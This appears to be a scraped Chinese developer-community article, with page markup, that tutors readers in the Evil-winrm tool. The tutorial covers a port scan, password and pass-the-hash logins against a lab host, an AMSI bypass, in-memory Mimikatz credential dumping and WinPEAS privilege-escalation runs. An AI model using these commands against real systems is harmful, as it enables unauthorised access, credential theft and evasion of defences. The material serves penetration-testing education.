[Tools] Evil-winrm, a super management terminal for hacker penetration testing - Tencent Cloud Developer Community - Tencent Cloud
<!DOCTYPE html><html lang="zh" munual-autotracker-init="" qct-uid="" qct-pv-id="71-MWCFpCVoTQ0mrbAq7T" qct-ip="8.222.208.146"><head><meta charSet="UTF-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta name="format-detection" content="telephone=no"/><title>[Tools] Evil-winrm, a super management terminal for hacker penetration testing - Tencent Cloud Developer Community - Tencent Cloud</title><meta name="subject" content="其他-空类-tools,其他-空类-工具,其他-空类-管理,其他-空类-终端,通用技术-开发技术-黑客"/><meta name="subjectTime" content="2024-11-27 18:26:06"/><meta name="articleSource" content="W"/><meta name="magicSource" content="N"/><meta name="authorType" content="Z,O"/><meta name="productSlug" content="wpt,ddos"/><meta name="keywords" content="tools,工具,管理,终端,黑客"/><meta name="description" content="In network security, technical progress always goes hand in hand with the contest between attack and defence. Today we take a close look at Evil-winrm, an efficient penetration-testing tool developed by the Hackplayers team and designed to simplify penetration testing in Microsoft Windows environments. Evil-winrm works together with the PowerShell Remoting Protocol (PSRP) and uses the Windows Remote Management protocol (..."/><meta property="og:title" content="[Tools] Evil-winrm, a super management terminal for hacker penetration testing - Tencent Cloud Developer Community - Tencent Cloud"/><meta property="og:description" content="In network security, technical progress always goes hand in hand with the contest between attack and defence. Today we take a close look at Evil-winrm, an efficient penetration-testing tool developed by the Hackplayers team and designed to simplify penetration testing in Microsoft Windows environments. Evil-winrm works together with the PowerShell Remoting Protocol (PSRP) and uses the Windows Remote Management protocol (..."/><meta property="og:image" content="https://cloudcache.tencentcs.com/open_proj/proj_qcloud_v2/gateway/shareicons/cloud.png"/><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1, viewport-fit=cover"/><link rel="dns-prefetch" href="//qccommunity.qcloudimg.com"/><link rel="dns-prefetch" href="//ask.qcloudimg.com"/><link rel="dns-prefetch" href="//cloudcache.tencentcs.com"/><link rel="canonical" href="https://cloud.tencent.com/developer/article/2471795"/><meta name="next-head-count" content="20"/><link rel="stylesheet" href="https://imgcache.qq.com/open_proj/proj_qcloud_v2/gateway/portal/css/base.css"/><link rel="stylesheet" href="https://cloudcache.tencentcs.cn/qcloud/ui/cloud-community/build/base/base-202502111512.css"/><style type="text/css"> .rno-markdown p * { white-space: pre-wrap; word-break: 
break-all; } .tea-overlay { z-index: 99999!important; } </style><link rel="stylesheet" href="https://cloudcache.tencentcs.cn/qcloud/ui/cloud-community/build/Article/Article-202502111516.css"/><link rel="stylesheet" href="https://cloudcache.tencent-cloud.cn/qcloud/draft-master/dist/draft-master-v2.1.2.d4s2ddo9sb.css"/><link rel="stylesheet" href="https://qccommunity-1258344699.cos.ap-guangzhou.myqcloud.com/tc_player/releasev5.1.0/tcplayer.min.css"/><script src="https://tam.cdn-go.cn/aegis-sdk/latest/aegis.min.js"></script><script> if (Aegis) { new Aegis({ id: 'dWlmyFvjDnalkbZO8q', env: 'production', onError: true, pagePerformance: true, reportAssetSpeed: true, api: { reportRequest: true, resHeaders: ['x-req-id'], }, reportApiSpeed: true, beforeRequest: function (data) { // load js failed if (data.logType === 'log') { if (data.logs.level === '32' && data.logs.msg.indexOf('google') > -1) return false; } var ignoreKeys = [ 'Script error', 'chrome-extension', 'qq.com', 'queryWeappQrcodeStatus', 'login/ajax/info', 'woa.com', 'trafficCollect.php', 'google', 'dscache', 'act-api', 'set_qc_cookie', 'opc.cloud.tencent.com', 'uc_gre_ad_buss', 'eb.xcj.pub', 'UCShellJava', '/developer/labs/quick/loader', 'edgeImmersiveReaderDOM', 'sendBeacon', 'error-decoder.html', 'qcloud-community-track.min.js' ]; var alarmMsg = [data.logs.url, data.logs.msg].join('|'); for (var i = 0; i < ignoreKeys.length; i++) { if (alarmMsg.indexOf(ignoreKeys[i]) != -1) return false; } if (/bot|wechatdevtools|spider/i.test(navigator.userAgent)) { return false; } if (location.hostname.indexOf('cloud.tencent.') === -1) { return false; } }, }); } </script><link rel="preload" href="https://qccommunity.qcloudimg.com/community/_next/static/css/15864e0bbdb1e0dc.css" as="style"/><link rel="stylesheet" href="https://qccommunity.qcloudimg.com/community/_next/static/css/15864e0bbdb1e0dc.css" data-n-g=""/><link rel="preload" href="https://qccommunity.qcloudimg.com/community/_next/static/css/cb2973c13eafc770.css" 
as="style"/><link rel="stylesheet" href="https://qccommunity.qcloudimg.com/community/_next/static/css/cb2973c13eafc770.css" data-n-p=""/><link rel="preload" href="https://qccommunity.qcloudimg.com/community/_next/static/css/76e9fe126c1f99d5.css" as="style"/><link rel="stylesheet" href="https://qccommunity.qcloudimg.com/community/_next/static/css/76e9fe126c1f99d5.css" data-n-p=""/><link rel="preload" href="https://qccommunity.qcloudimg.com/community/_next/static/css/6bae135cca0bd2a2.css" as="style"/><link rel="stylesheet" href="https://qccommunity.qcloudimg.com/community/_next/static/css/6bae135cca0bd2a2.css" data-n-p=""/><noscript data-n-css=""></noscript><script defer="" nomodule="" src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js"></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/webpack-ecb33d6f281c3863.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/framework-bae252e255276064.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/main-b171722e7f1a1add.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/pages/_app-4d4d0038fd3b92af.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/3598-9ce47f9460fcd2e8.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/900-754acf570f26d1b3.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/5711-8b004fba753fc2ae.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/1522-ac3b1777b1c36fd6.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/4031-e3e3905dc88f3f92.js" defer=""></script><script 
src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/9142-8d6871ee01ef3752.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/2929-2732ed4070c148cd.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/6213-23c1f09036ef74b2.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/3751-d6902cb0fa3abff0.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/9159-237e4ba66a152bd5.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/4036-6e337191f9b1f6d5.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/1126-c4d27d89bdcaa920.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/432-8c085b26d42596c0.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/2654-a4137ccd8ac059bd.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/856-06c42ea61ae5c3f2.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/9179-8e6d979e9f59fb65.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/4698-c5f3e13cdb54e8e1.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/6326-791c8ec3fe3e7c9f.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/8899-a236cb0292d33b84.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/4989-ab5859ddb53d3104.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/9621-3128a32b4a60c481.js" defer=""></script><script 
src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/9156-e37c75a3b314bfda.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/chunks/pages/article/%5BarticleId%5D-f1fa4a2b494e4989.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/9hp3loRhW5K95-TQOzEpv/_buildManifest.js" defer=""></script><script src="https://qccommunity.qcloudimg.com/community/_next/static/9hp3loRhW5K95-TQOzEpv/_ssgManifest.js" defer=""></script></head><body class=""><div id="__next"><script src="https://dscache.tencent-cloud.cn/ecache/qcstat/qcloud/qcloudStatApi.js"></script><script src="https://qccommunity.qcloudimg.com/common/exposure-plugin-4.1.15.min.js"></script><script src="https://qccommunity.qcloudimg.com/community-track/qcloud-community-track.min.js"></script><div class="cdc-responsive-layout" aegis-first-screen-timing="true" qct-area="文章详情页"><div class="cdc-article-page cdc-global"><div class="cdc-global__main"><div class="cdc-article__body"><div class="cdc-layout"><div class="cdc-layout__main"><div class="mod-article-content"><div class="mod-header"><div class="mod-header__top"><div class="mod-header__title"><h1 class="title-text">[Tools] Evil-winrm, a super management terminal for hacker penetration testing</h1></div></div><div class="mod-article-source header"><div class="mod-article-source__main"><div class="mod-article-source__detail"><div class="mod-article-source__name"><span>释然IT杂谈</span></div></div></div></div><div class="mod-header__bottom"><div class="mod-header__detail"><div class="mod-header__date"><span class="date-text">Published on 2024-11-27 18:26:06</span></div></div></div><div class="mod-header__special"><div class="cdc-special-guide"><span>This article is included in the column: </span><a class="cdc-special-guide-name">释然IT杂谈</a></div></div></div><div class="mod-content"><div class="mod-content__markdown"><div><div class="rno-markdown new-version 
rno-"><p>前言介绍:</p><p>在网络安全领域,技术的进步总是伴随着攻防两端的较量。今天,我们将深入探讨一个由Hackplayers团队开发的高效渗透工具——Evil-winrm,它专为简化Microsoft Windows环境下的渗透测试而设计。Evil-winrm与PowerShell远程协议(PSRP)协同工作,利用Windows远程管理协议(WinRM)实现远程操作。</p><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:100%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/ba9e7899724c2581f2d66168687481c4.png" alt="" style="width:100%"/></div></div></div></figure><p>Evil-winrm工具以其多功能性和实用性脱颖而出,它不仅支持通过纯文本密码、SSL加密、NTLM哈希、密钥等多种方式进行远程登录,还具备文件传输、日志记录等高级功能。此外,该工具还能绕过某些安全软件在内存中加载DLL文件,动态绕过AMSI等安全机制。</p><p> 该工具已在Kali Linux系统中集成,但如果您想单独下载使用,则可以从其官方 git 存储库下载它。作为一款开源软件,Evil-winrm的获取十分便捷,您可以直接访问GitHub上的项目页面进行下载。</p><p><u>https://github.com/Hackplayers/evil-winrm</u></p><p>WinRM服务的发现与利用:</p><p>WinRM是微软Windows操作系统中的一种远程管理协议,基于WS-Management协议,允许远程执行命令、脚本和管理任务。通过nmap工具,我们可以检测目标主机是否开启了WinRM服务的两个默认端口5895和5896,使用如下命令:</p><div class="rno-markdown-code"><div class="rno-markdown-code-toolbar"><div class="rno-markdown-code-toolbar-info"><div class="rno-markdown-code-toolbar-item is-type"><span class="is-m-hidden">代码语言:</span>javascript</div><div class="rno-markdown-code-toolbar-item is-num"><i class="icon-code"></i><span class="is-m-hidden">代码</span>运行次数:<!-- -->0</div></div><div class="rno-markdown-code-toolbar-opt"><div class="rno-markdown-code-toolbar-copy"><i class="icon-copy"></i><span class="is-m-hidden">复制</span></div><button class="rno-markdown-code-toolbar-run"><i class="icon-run"></i><span class="is-m-hidden">Cloud Studio</span> 代码运行</button></div></div><div class="developer-code-block"><pre class="prism-token token line-numbers language-javascript"><code class="language-javascript" style="margin-left:0">nmap -p 5985,5986 192.168.1.19 </code></pre></div></div><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:86.82%"><div style="width:100%"><img 
src="https://developer.qcloudimg.com/http-save/yehe-2017757/782139bb357672ee1d85e120caf3c50a.png" alt="" style="width:100%"/></div></div></div></figure><p>一旦确认目标主机的WinRM服务已开启,我们便可以使用Evil-winrm进行远程管理。</p><p>多种登录方式:</p><p>Evil-winrm支持多种登录方式,包括使用纯文本密码登录、启动SSL加密的登录会话、利用NTLM哈希进行传递哈希攻击等。</p><p><strong>纯文本密码登录:</strong></p><p>如果您已经通过合法的枚举方式获取了目标主机的纯文本密码,您可以使用Evil-winrm工具进行远程会话。以下是如何使用Evil-winrm进行远程会话的示例命令:</p><div class="rno-markdown-code"><div class="rno-markdown-code-toolbar"><div class="rno-markdown-code-toolbar-info"><div class="rno-markdown-code-toolbar-item is-type"><span class="is-m-hidden">代码语言:</span>javascript</div><div class="rno-markdown-code-toolbar-item is-num"><i class="icon-code"></i><span class="is-m-hidden">代码</span>运行次数:<!-- -->0</div></div><div class="rno-markdown-code-toolbar-opt"><div class="rno-markdown-code-toolbar-copy"><i class="icon-copy"></i><span class="is-m-hidden">复制</span></div><button class="rno-markdown-code-toolbar-run"><i class="icon-run"></i><span class="is-m-hidden">Cloud Studio</span> 代码运行</button></div></div><div class="developer-code-block"><pre class="prism-token token line-numbers language-javascript"><code class="language-javascript" style="margin-left:0">evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 </code></pre></div></div><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:94.25%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/261b558d4bb2028ad13ac47927d178d0.png" alt="" style="width:100%"/></div></div></div></figure><p>可以看到, 已经成功建立起远程会话。</p><p><strong>启动SSL加密的登录:</strong></p><p>为了增强远程会话的安全性,可以使用Evil-winrm工具通过SSL加密WinRM连接。当启用SSL功能时,所有传输的数据都将被加密,这有助于保护会话免受中间人攻击和其他网络层面的威胁。</p><div class="rno-markdown-code"><div class="rno-markdown-code-toolbar"><div class="rno-markdown-code-toolbar-info"><div class="rno-markdown-code-toolbar-item is-type"><span class="is-m-hidden">代码语言:</span>javascript</div><div 
class="rno-markdown-code-toolbar-item is-num"><i class="icon-code"></i><span class="is-m-hidden">代码</span>运行次数:<!-- -->0</div></div><div class="rno-markdown-code-toolbar-opt"><div class="rno-markdown-code-toolbar-copy"><i class="icon-copy"></i><span class="is-m-hidden">复制</span></div><button class="rno-markdown-code-toolbar-run"><i class="icon-run"></i><span class="is-m-hidden">Cloud Studio</span> 代码运行</button></div></div><div class="developer-code-block"><pre class="prism-token token line-numbers language-javascript"><code class="language-javascript" style="margin-left:0">evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -S </code></pre></div></div><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:95.16%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/7fc49f928a8e4c7f9a4835937cc5f927.png" alt="" style="width:100%"/></div></div></div></figure><p><strong>NTLM哈希登录:</strong></p><p>可以通过利用evil-winrm工具执行传递哈希攻击(Pass-The-Hash)来建立PowerShell会话。这种攻击方式允许攻击者使用NTLM哈希值而不是纯文本密码进行远程登录。以下是执行此类攻击的完整命令示例:</p><div class="rno-markdown-code"><div class="rno-markdown-code-toolbar"><div class="rno-markdown-code-toolbar-info"><div class="rno-markdown-code-toolbar-item is-type"><span class="is-m-hidden">代码语言:</span>javascript</div><div class="rno-markdown-code-toolbar-item is-num"><i class="icon-code"></i><span class="is-m-hidden">代码</span>运行次数:<!-- -->0</div></div><div class="rno-markdown-code-toolbar-opt"><div class="rno-markdown-code-toolbar-copy"><i class="icon-copy"></i><span class="is-m-hidden">复制</span></div><button class="rno-markdown-code-toolbar-run"><i class="icon-run"></i><span class="is-m-hidden">Cloud Studio</span> 代码运行</button></div></div><div class="developer-code-block"><pre class="prism-token token line-numbers language-javascript"><code class="language-javascript" style="margin-left:0">evil-winrm -i 192.168.1.19 -u administrator -H 
32196B56FFE6F45E294117B91A83BF38 </code></pre></div></div><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:96.22%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/cb7a6515397d2c688d637854b3872afc.png" alt="" style="width:100%"/></div></div></div></figure><p>执行PowerShell脚本:</p><p>Evil-winrm还允许用户直接从本地机器加载PowerShell脚本到目标机器的内存中,同时提供绕过AMSI的功能。</p><p>脚本获取来源:</p><p><strong>https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1</strong></p><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:95.16%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/530dde0b0aab03a08634ba06ec79abba.png" alt="" style="width:100%"/></div></div></div></figure><p>使用以下命令可以加载并执行Mimikatz脚本:</p><div class="rno-markdown-code"><div class="rno-markdown-code-toolbar"><div class="rno-markdown-code-toolbar-info"><div class="rno-markdown-code-toolbar-item is-type"><span class="is-m-hidden">代码语言:</span>javascript</div><div class="rno-markdown-code-toolbar-item is-num"><i class="icon-code"></i><span class="is-m-hidden">代码</span>运行次数:<!-- -->0</div></div><div class="rno-markdown-code-toolbar-opt"><div class="rno-markdown-code-toolbar-copy"><i class="icon-copy"></i><span class="is-m-hidden">复制</span></div><button class="rno-markdown-code-toolbar-run"><i class="icon-run"></i><span class="is-m-hidden">Cloud Studio</span> 代码运行</button></div></div><div class="developer-code-block"><pre class="prism-token token line-numbers language-javascript"><code class="language-javascript" style="margin-left:0"></code></pre></div></div><div class="rno-markdown-code"><div class="rno-markdown-code-toolbar"><div class="rno-markdown-code-toolbar-info"><div class="rno-markdown-code-toolbar-item is-type"><span class="is-m-hidden">代码语言:</span>javascript</div><div 
class="rno-markdown-code-toolbar-item is-num"></div></div></div><div class="developer-code-block"><pre class="prism-token token line-numbers language-javascript"><code class="language-javascript" style="margin-left:0">evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -s /opt/privsc/powershell
Bypass-4MSI
Invoke-Mimikatz.ps1</code></pre></div></div><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:100%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/fcfa74083d5efbc77190adc1704cc167.png" alt="" style="width:100%"/></div></div></div></figure><p>Log storage and running executables:</p><p>Evil-winrm also provides log storage, which makes it easy to keep a record of operations during CTF competitions or penetration tests. It can also run exe executables inside the PowerShell session, which is a great convenience for the attacker.</p><p><strong>Log storage:</strong></p><p>The <code>-l</code> flag saves all logs to the local machine.</p><div class="rno-markdown-code"><div class="developer-code-block"><pre class="prism-token token line-numbers language-javascript"><code 
class="language-javascript" style="margin-left:0">evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -l</code></pre></div></div><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:100%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/90887e058d889ab20026c22a8154457a.png" alt="" style="width:100%"/></div></div></div></figure><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:100%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/1a8bf1f749f5242188b038372bba6f73.png" alt="" style="width:100%"/></div></div></div></figure><p><strong>Running executables:</strong></p><p>Supply the path of the <code>WinPEAS.exe</code> executable stored on the local machine:</p><div class="rno-markdown-code"><div class="developer-code-block"><pre class="prism-token token line-numbers language-javascript"><code class="language-javascript" style="margin-left:0">evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -e /opt/privsc
Bypass-4MSI
menu
Invoke-Binary /opt/privsc/winPEASx64.exe</code></pre></div></div><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:100%"><div style="width:100%"><img 
src="https://developer.qcloudimg.com/http-save/yehe-2017757/ead10960b12a27fa34a92e786c48e70d.png" alt="" style="width:100%"/></div></div></div></figure><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:100%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/c0ead9f3ddd599b1cd45c0ef0d035f25.png" alt="" style="width:100%"/></div></div></div></figure><p>Service enumeration and file transfer:</p><p>Evil-winrm can list all services running on the target system, helping the attacker identify services that other tools did not detect. It also supports uploading and downloading files, which simplifies file transfer between the target system and the attacker's machine.</p><p><strong>Service enumeration:</strong></p><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:100%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/b3d5b3731a4e46b9b57aa183833eb7e8.png" alt="" style="width:100%"/></div></div></div></figure><p><strong>File transfer:</strong></p><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:96.07%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/33e62467913e729617b97daf99c55906.png" alt="" style="width:100%"/></div></div></div></figure><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:95.76%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/f50957d563ecdca3f5dcd4ee01eee0c2.png" alt="" style="width:100%"/></div></div></div></figure><p>Summary</p><p>Evil-winrm is a powerful penetration testing tool. With its multiple login methods, script execution, log storage and other features, it greatly simplifies the penetration testing process. As cybersecurity threats keep evolving, tools such as Evil-winrm play an increasingly important role in the toolboxes of security experts and penetration testers.</p></div></div></div><div class="mod-content__source"><div class="mod-content__source-inner"><div class="mod-content__source-title">This article is part of the <a href="/developer/support-plan" target="_blank">Tencent Cloud self-media syndication program</a> and was shared from a WeChat official account.</div><div 
class="mod-content__source-desc">Originally published: 2024-11-26</div></div><div class="mod-content__source-qr"></div></div><div class="mod-statement-m"><div class="mod-content__statement"><p>This article was shared from the WeChat official account <span>释然IT杂谈</span>.</p></div></div><div class="cdc-tag__list mod-content__tags" track-click=""><div class="cdc-tag" track-click="" track-exposure=""><a class="cdc-tag__inner" href="/developer/tag/16545" target="_blank">tools</a></div><div class="cdc-tag" track-click="" track-exposure=""><a class="cdc-tag__inner" href="/developer/tag/17276" target="_blank">tool</a></div><div class="cdc-tag" track-click="" track-exposure=""><a class="cdc-tag__inner" href="/developer/tag/17287" target="_blank">management</a></div><div class="cdc-tag" track-click="" track-exposure=""><a class="cdc-tag__inner" href="/developer/tag/17592" target="_blank">terminal</a></div><div class="cdc-tag" track-click="" track-exposure=""><a 
class="cdc-tag__inner" href="/developer/tag/10672" target="_blank">hacker</a></div></div></div></div></div></div></div></div></div></div></div><script 
src="https://qccommunity-1258344699.cos.ap-guangzhou.myqcloud.com/tc_player/releasev5.1.0/tcplayer.v5.1.0.min.js"></script><script id="__NEXT_DATA__" type="application/json">{"props":{"isMobile":false,"isSupportWebp":false,"currentDomain":"cloud.tencent.com","baseUrl":"https://cloud.tencent.com","reqId":"71-MWCFpCVoTQ0mrbAq7T","query":{"articleId":"2471795"},"platform":"other","env":"production","__N_SSP":true,"pageProps":{"fallback":{"#url:\"/api/article/detail\",params:#articleId:2471795,,":{"articleData":{"articleId":2471795,"codeLineNum":20,"readingTime":358,"wordsNum":1642},"articleInfo":{"articleId":2471795,"channel":4,"commentNum":0,"content":{"blocks":[{"key":"8jgoc","text":"Introduction:","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"ee59","text":"In network security, technical progress always goes hand in hand with the contest between attack and defense. Today we take a close look at Evil-winrm, an efficient penetration-testing tool developed by the Hackplayers team and designed to simplify penetration testing in Microsoft Windows environments. Evil-winrm works with the PowerShell Remoting Protocol (PSRP) and uses the Windows Remote Management protocol (WinRM) to carry out remote operations.","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"1tbp8","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":0}],"data":{}},{"key":"7ts9i","text":"Evil-winrm stands out for its versatility and practicality. It supports remote login with a plain-text password, over SSL, with an NTLM hash, with keys and in other ways, and it also offers advanced features such as file transfer and logging. In addition, the tool can load DLL files in memory, bypassing some security software, and dynamically bypass security mechanisms such as AMSI.","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"1cn00","text":"The tool is already included in Kali Linux, but if you want to download it separately you can get it from its official git repository. Evil-winrm is open-source software and easy to obtain: you can download it directly from the project page on GitHub.","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},
{"key":"bq86a","text":"https://github.com/Hackplayers/evil-winrm","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":41,"style":"UNDERLINE"}],"entityRanges":[],"data":{}},{"key":"e58vg","text":"Discovering and using the WinRM service:","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"e3jmb","text":"WinRM is a remote management protocol in the Microsoft Windows operating system. It is based on the WS-Management protocol and allows commands, scripts and management tasks to be run remotely. With nmap we can check whether the target host has the two default WinRM ports, 5985 and 5986, open, using the following command:","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"eguop","text":"nmap -p 5985,5986 192.168.1.19\n","type":"code-block","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{"syntax":"javascript"}},{"key":"9o2f7","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":1}],"data":{}},{"key":"3rbqb","text":"Once we have confirmed that the WinRM service is enabled on the target host, we can use Evil-winrm for remote management.","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"5hmlp","text":"Multiple login methods:","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"5g228","text":"Evil-winrm supports several login methods, including login with a plain-text password, a login session with SSL encryption enabled, and a pass-the-hash attack using an NTLM hash.","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"2vui7","text":"Plain-text password login:","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":26,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"drt0g","text":"If you have already obtained the target host's plain-text password through legitimate enumeration, you can use Evil-winrm to open a remote session. The following example command shows how:","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"al54","text":"evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987\n","type":"code-block","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{"syntax":"javascript"}},
{"key":"67mme","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":2}],"data":{}},{"key":"dnacs","text":"As you can see, the remote session has been established successfully.","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"eg00q","text":"SSL-encrypted login:","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":20,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"950mq","text":"To make the remote session more secure, Evil-winrm can encrypt the WinRM connection with SSL. When SSL is enabled, all transmitted data is encrypted, which helps protect the session against man-in-the-middle attacks and other network-level threats.","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"d5e4a","text":"evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -S\n","type":"code-block","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{"syntax":"javascript"}},{"key":"dcho","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":3}],"data":{}},{"key":"btvlm","text":"NTLM hash login:","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":16,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"6v3t7","text":"A PowerShell session can be established by using evil-winrm to carry out a pass-the-hash (Pass-The-Hash) attack. This attack lets an attacker log in remotely with an NTLM hash instead of a plain-text password. The following is a complete example command for this kind of attack:","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"chfkb","text":"evil-winrm -i 192.168.1.19 -u administrator -H 32196B56FFE6F45E294117B91A83BF38\n","type":"code-block","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{"syntax":"javascript"}},
{"key":"4hpgs","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":4}],"data":{}},{"key":"dm31t","text":"Running PowerShell scripts:","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"26t4h","text":"Evil-winrm also lets the user load PowerShell scripts from the local machine directly into the target machine's memory, and it provides an AMSI bypass feature.","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"binta","text":"Script source:","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"fc4hm","text":"https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":85,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"b37bh","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":5}],"data":{}},{"key":"9jegf","text":"The following commands load and run the Mimikatz 